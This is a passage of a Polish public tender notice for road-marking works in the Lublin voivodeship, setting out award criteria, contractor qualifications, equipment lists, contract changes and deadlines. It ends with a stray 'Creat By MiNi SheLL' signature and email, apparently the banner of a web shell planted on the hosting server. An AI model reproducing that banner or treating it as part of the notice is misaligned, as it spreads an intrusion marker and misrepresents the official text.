od daty odbioru ostatecznego PR -= 0 pkt.<br/>- nie mniej niż 120 mcd * m-2 * lx-1 – dla oznakowania eksploatowanego po 8 miesiącach od daty odbioru ostatecznego PR -= 10<br/>pkt.<br/>W przypadku nie wskazania zaoferowanego parametru Zamawiający przyjmie, iż Wykonawca oferuje parametr nie mniejszy niż 100<br/>mcd * m-2 * lx-1.<br/>Za najkorzystniejszą uznana będzie oferta, która uzyska najwyższą łączną ilość punktów na dane Zadanie obliczoną według wzoru:<br/>P = PC x 60 % + PR x 40 %</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">oferowana jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	Zdolności technicznej lub zawodowej<br/>1.1	dysponowanie minimum jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, zdolną do pełnienia funkcji kierownika robót, posiadającą kwalifikacje do kierowania robotami w zakresie dróg,<br/>W/w minimalny warunek będzie spełniony niezależnie od ilości zadań, na które Wykonawca zamierza złożyć ofertę. <br/>2)	Dysponowania wiedzą i doświadczeniem:<br/>2.1 W przypadku ubiegania się o jedno zadanie - wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>- co najmniej 1 roboty budowlanej polegającej na wykonaniu oznakowania poziomego cienkowarstwowego na drogach publicznych o wartości minimum 180 tys. zł. (Zamawiający dopuszcza, jako równoważne, wykazanie wykonania 1 roboty budowlanej polegającej na wykonaniu oznakowania cienkowarstwowego o powierzchni min. 20 tys. m2)<br/>2.2	W przypadku ubiegania się o dwa lub trzy zadania- wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>- co najmniej 1 roboty budowlanej polegającej na wykonaniu oznakowania poziomego cienkowarstwowego na drogach publicznych o wartości minimum 600 tys. zł. (Zamawiający dopuszcza, jako równoważne, wykazanie wykonania 1 roboty budowlanej polegającej na wykonaniu oznakowania cienkowarstwowego o powierzchni min. 60 tys. m2)<br/>2.3	W przypadku ubiegania się o cztery i więcej zadania- wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: <br/>- co najmniej 1 roboty budowlanej polegającej na wykonaniu oznakowania poziomego cienkowarstwowego na drogach publicznych o wartości minimum <br/>1 600 tys. zł. (Zamawiający dopuszcza, jako równoważne, wykazanie wykonania 1 roboty budowlanej polegającej na wykonaniu oznakowania cienkowarstwowego o powierzchni min. 150 tys. m2 )<br/><br/>3) Dysponowanie potencjałem technicznym tj.<br/>3.1	W przypadku ubiegania się o jedno zadanie:<br/>-	minimum trzy malowarki samojezdne, hydrodynamiczne o wydajności 2000 m2/dzień,<br/>-	minimum dwie malowarki hydrodynamiczne do malowania na przejściach dla pieszych pasów o szerokości 50 cm wraz z posypywaniem pod ciśnieniem granulatu,<br/>-	Urządzenia do trwałego usuwania oznakowania poziomego: min. 3 szt. (frezarki, lub śrutownice, lub maszyny do trwałego usuwania oznakowania poziomego strumieniem wody – polegającym na ciągłym natrysku strumienia wody podciśnieniem, usuwającym warstwę oznakowania).<br/>-	Reflektometr – 1 szt.<br/>-	Przyczepka z oznakowaniem robót awaryjnych, wyposażona w wymagane znaki drogowe oraz lampy błyskowe min. 3 szt.<br/>-	Sprężarka min. 2 szt.<br/>-	Układarka do wykonania oznakowania grubowarstwowego z mas chemoutwardzalnych – 1 szt. (nie dotyczy w przypadku złożenia oferty wyłącznie na zadanie nr II lub VII)<br/>3.2	W przypadku ubiegania się o dwa lub trzy zadania:<br/>-	minimum cztery malowarek samojezdnych, hydrodynamiczne o wydajności 2000 m2/dzień,<br/>-	minimum trzy malowarki hydrodynamiczne do malowania na przejściach dla pieszych pasów o szerokości 50 cm wraz z posypywaniem pod ciśnieniem granulatu,<br/>-	Urządzenia do trwałego usuwania oznakowania poziomego: min. 3 szt. (frezarki, lub śrutownice, lub maszyny do trwałego usuwania oznakowania poziomego strumieniem wody - polegającym na ciągłym natrysku strumienia wody podciśnieniem, usuwającym warstwę oznakowania).<br/>-	Reflektometr – 1 szt.<br/>-	Przyczepka z oznakowaniem robót awaryjnych, wyposażona w wymagane znaki drogowe oraz lampy błyskowe min.4 szt.<br/>-	Sprężarka min. 3 szt.<br/>-	Układarka do wykonania oznakowania grubowarstwowego z mas chemoutwardzalnych – 1 szt. (nie dotyczy w przypadku złożenia oferty wyłącznie na zadanie nr II lub VII).<br/>3.3	W przypadku ubiegania się o cztery i więcej zadań:<br/>-	minimum sześć malowarek samojezdnych, hydrodynamiczne o wydajności 2000 m2/dzień,<br/>-	minimum cztery malowarki hydrodynamiczne do malowania na przejściach dla pieszych pasów o szerokości 50 cm wraz z posypywaniem pod ciśnieniem granulatu,<br/>-	Urządzenia do trwałego usuwania oznakowania poziomego: min. 3 szt. (frezarki, lub śrutownice, lub maszyny do trwałego usuwania oznakowania poziomego strumieniem wody - polegającym na ciągłym natrysku strumienia wody podciśnieniem, usuwającym warstwę oznakowania).<br/>-	Reflektometr – 1 szt.<br/>-	Przyczepka z oznakowaniem robót awaryjnych, wyposażona w wymagane znaki drogowe oraz lampy błyskowe min.6 szt.<br/>-	Sprężarka min. 4 szt.<br/>-	Układarka do wykonania oznakowania grubowarstwowego z mas chemoutwardzalnych – 1 szt.<br/><br/>2.	Spełnianie warunków z pkt. 1. 1) oraz 1. 3) Zamawiający oceni na podstawie oświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących środków dowodowych:<br/>−	Wykazu minimum 1 roboty, o której mowa w pkt. VII.1.2) SWZ (wzór załącznik I) wykonanej w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem jej rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz którego robota ta została wykonana, oraz załączeniem dowodów określających czy ta robota została wykonana należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi wykonawcami wykaz winien dotyczyć robót, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta musi zawierać następujące oświadczenia i dokumenty:1)	Ofertę przetargową (z ceną brutto, netto, VAT) wzór Załącznik A do SWZ wraz z załączonym/załączonymi kosztorysem ofertowym/kosztorysami ofertowymi,<br/>2)	Oświadczenia, o których mowa w pkt IX. 1. SWZ stanowiące Załącznik B i C do SWZ; wraz z oświadczeniem o braku podstaw wykluczenia z ustawy sankcyjnej - wzór - Załącznik F oraz oświadczeniem o braku podstaw wykluczenia z ustawy sankcyjnej dla podmiotu trzeciego - wzór - Załącznik G (jeżeli dotyczy),<br/>3)	Oświadczenie „Wykonawców wspólnie ubiegających się o udzielenie zamówienia” – Zał. D (jeżeli dotyczy),<br/>4) Zobowiązanie lub inne dokumenty, o których mowa w pkt X. 4 SWZ (jeżeli dotyczy),<br/>5) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu udostępniającego zasoby: <br/>a)	Wykonawca lub podmiot udostępniający zasoby w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy lub podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, może złożyć wraz z ofertą odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b)	Wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>c)	jeżeli w imieniu Wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w lit a), Zamawiający żąda od Wykonawcy lub podmiotu udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy lub podmiotu udostępniającego zasoby.<br/>6)	Pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (jeżeli dotyczy).<br/><br/>8. Pełnomocnictwo o którym mowa w pkt XV.7. ppkt 5) lit c) i ppkt 6) SWZ składa się, pod rygorem nieważności w formie elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym lub w formie elektronicznej kopii poświadczonej za zgodność notarialnie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>a)	oświadczenia o których mowa w pkt. IX.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b)	w przypadku, o którym mowa w pkt. VII.4 SWZ oraz IX. 6 SWZ Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>3.	Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 455 ust 1 pkt 1) ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmiany<br/>umowy polegających na:<br/>1) Zmianie terminu wykonania umowy w przypadku:<br/>a) wystąpienia niekorzystnych warunków atmosferycznych (tj. opady deszczu oraz wysokie temperatury uniemożliwiające<br/>wykonanie robót zgodnie z STWiORB), powodujących wstrzymanie prac przynajmniej przez 8 godzin w ciągu doby. W<br/>takim przypadku termin może ulec przesunięciu o jeden dzień. Termin wykonania zamówienia zostanie przedłużony o liczbę<br/>dni potwierdzonych przez Osobę Nadzorującą.<br/>Ilość tych dni określa osoba nadzorująca z ramienia Zamawiającego sporządzając stosowny protokół.<br/>b) opóźnienia w wykonaniu remontów cząstkowych nawierzchni bitumicznych i usuwaniu skutków przełomów dróg<br/>wojewódzkich znajdujących się na terenie działania Zarządu Dróg Wojewódzkich w Lublinie, na drogach objętych<br/>przedmiotowym zamówieniem. Termin wykonania umowy wydłuża się o liczbę dni, o którą opóźniono rozpoczęcie zamówienia z uwagi na prowadzone remonty. Ilość tych dni określa osoba nadzorująca z ramienia Zamawiającego<br/>sporządzając stosowny protokół.<br/>2) zmianie wynagrodzenia w przypadku gdy zmianie ulegnie stawka podatku VAT - wynagrodzenie ulegnie zmianie w ten<br/>sposób, że wynagrodzenie netto pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie, co<br/>wymaga zawarcia stosownego aneksu.<br/>3) zmniejszeniu ilości robót, zmiany technologii pomiędzy oznakowaniem cienkowarstwowym a grubowarstwowym bez<br/>zmiany wynagrodzenia umownego oraz przesunięciach ilości robót pomiędzy drogami w ramach jednego zadania. Zmiana<br/>nie wymaga aneksu do umowy.<br/>4) Zmianach osobowych - zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające<br/>warunki określone w SWZ,<br/>5) Zmianie podwykonawcy - podmiotu, na którego zasoby Wykonawca powołuje się na zasadach określonych w art. 118<br/>ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku akceptacji przez Zamawiającego<br/>wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie mniejszym<br/>niż podwykonawca na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia oraz nie<br/>zachodzą wobec podwykonawcy podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>6) Rezygnacji z podwykonawcy - podmiotu, na którego zasoby Wykonawca powołuje się na zasadach określonych w art.<br/>118 ustawy pzp, w celu wykazania spełniania warunków udziału w postępowaniu - w przypadku wykazania Zamawiającemu,<br/>iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca na którego zasoby Wykonawca się<br/>powołuje w trakcie postępowania o udzielenie zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektroniczna Platforma Zamówień Publicznych Zarządu Dróg Wojewódzkich w Lublinie pod adresem: https://zdw-lublin.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Środki ochrony prawnej:<br/>1. Odwołanie przysługuje na:<br/>1) niezgodną z przepisami ustawy czynność zamawiającego, podjętą w postępowaniu o udzielenie zamówienia, w tym na<br/>projektowane postanowienie umowy;<br/>2) zaniechanie czynności w postępowaniu o udzielenie zamówienia, do której zamawiający był obowiązany na podstawie<br/>ustawy;<br/>3) zaniechanie przeprowadzenia postępowania o udzielenie zamówienia lub zorganizowania konkursu na podstawie ustawy,<br/>mimo że zamawiający był do tego obowiązany.<br/>2. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej. Odwołujący przekazuje zamawiającemu odwołanie<br/>wniesione w formie elektronicznej albo postaci elektronicznej albo kopię tego odwołania, jeżeli zostało ono wniesione w<br/>formie pisemnej, przed upływem terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią<br/>przed upływem tego terminu. Domniemywa się, że Zamawiający mógł zapoznać się z treścią odwołania przed upływem<br/>terminu do jego wniesienia, jeżeli przekazanie odpowiednio odwołania albo jego kopii nastąpiło przed upływem terminu do<br/>jego wniesienia przy użyciu środków komunikacji elektronicznej.<br/>II. Osoby uprawnione do porozumiewania się z Wykonawcami: Paulina Komisarczuk<br/>III .Informacja dla Wykonawców polegających na zasobach innych podmiotów, na zasadach określonych w art. 118 ustawy<br/>Pzp oraz zamierzających powierzyć wykonanie części zamówienia podwykonawcom.<br/>1. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postepowaniu w stosownych sytuacjach oraz w<br/>odniesieniu do konkretnego zamówienia, lub jego części , polegać na zdolnościach technicznych lub zawodowych lub<br/>sytuacji finansowej lub ekonomicznej podmiotów udostepniających zasoby, niezależnie od charakteru prawnego łączących<br/>go z nimi stosunków prawnych.<br/>2. W odniesieniu do warunków dotyczących wykształcenia , kwalifikacji zawodowych lub doświadczenia wykonawcy mogą<br/>polegać na zdolnościach podmiotów udostepniających zasoby, jeśli podmioty te wykonują roboty budowlane do realizacji<br/>których te zdolności są wymagane. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności<br/>lub sytuację podmiotów udostepniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na<br/>zdolnościach lub sytuacji podmiotów udostepniających zasoby.<br/>IV. W przedmiotowym postepowaniu o udzielenie zamówienia publicznego mają zastosowanie podstawy wykluczenia, o<br/>których mowa w art.108 ust. 1 oraz w Ustawie z dnia 13 kwietnia 2022 r.,, O szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego&#34; (Dz.U. 2023 r.poz.1497 z późn. zm.).<br/>V. Zabezpieczenie należytego wykonania umowy nie jest wymagane.<br/><br/>VI. Termin wykonania zamówienia ustala się dla:<br/>- dróg zaliczanych do standardu A – do 100 dni, licząc od dnia podpisania umowy,<br/>- dróg zaliczanych do standardu B – do 120 dni, licząc od dnia podpisania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com